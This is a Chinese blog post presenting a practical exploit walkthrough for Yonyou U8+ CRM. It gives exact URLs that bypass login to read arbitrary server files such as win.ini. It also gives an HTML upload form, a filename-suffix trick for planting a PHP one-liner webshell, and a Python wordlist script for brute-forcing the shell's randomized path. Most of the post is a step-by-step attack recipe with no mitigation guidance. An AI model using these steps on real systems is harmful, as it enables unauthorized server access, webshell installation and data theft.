首页 > 其他分享 >【实战】用友U8+ CRM任意文件上传、任意文件读取

【实战】用友U8+ CRM任意文件上传、任意文件读取

时间:2023-02-24 18:58:15浏览次数:38  
标签:文件 U8 上传 用友 mht php 任意

用友CRM系统,使用量非常广,这里存在任意文件读取漏洞、任意文件上传漏洞

用友U8+ CRM系统主界面


任意文件读取

存在漏洞的文件为:

/ajax/getemaildata.php

访问http://IP:端口/ajax/getemaildata.php?DontCheckLogin=1&filePath=../version.txt

可以看到用友版本7.2 patch2

访问http://IP:端口/ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini

可以看到C://windows/win.ini

image-20230224171301663


任意文件上传

首先构造一个文件上传的页面

<html>

<form action="http://IP:端口//ajax/getemaildata.php?DontCheckLogin=1" method="post" enctype ="multipart/form-data"> 

  <input type="file" name="file" /> 

  <input type="submit" name="upload" value="upload"/>

</form>

</html>

选择php一句话木马

image-20230224171532696

打开burp进行抓包,在文件上传的后缀名处添加一个空格

image-20230224171701750

返回的tmpfile\\mht3AC8.tmp.mht即为木马地址,访问http://IP:端口/tmpfile//mht3AC8.tmp.mht即可看到未解析的马。木马的位置为tmpfile/upd****.tmp.php,将前面的mht改为upd,将后面的mht改为php

image-20230224172102022

抓包,将其放到爆破工具里,爆破中间的3AC8,范围是从0000~FFFF,共65536个

image-20230224172257758

生成字典的脚本如下:

with open('1.txt', 'w') as f:
    for i in range(0x10000):
        f.write(format(i, '04X') + '\n')

该脚本会在当前目录下生成1.txt

image-20230224172641017

成功访问到马

image-20230224172720429

标签:文件,U8,上传,用友,mht,php,任意
From: https://www.cnblogs.com/lizongxin/p/17152772.html

相关文章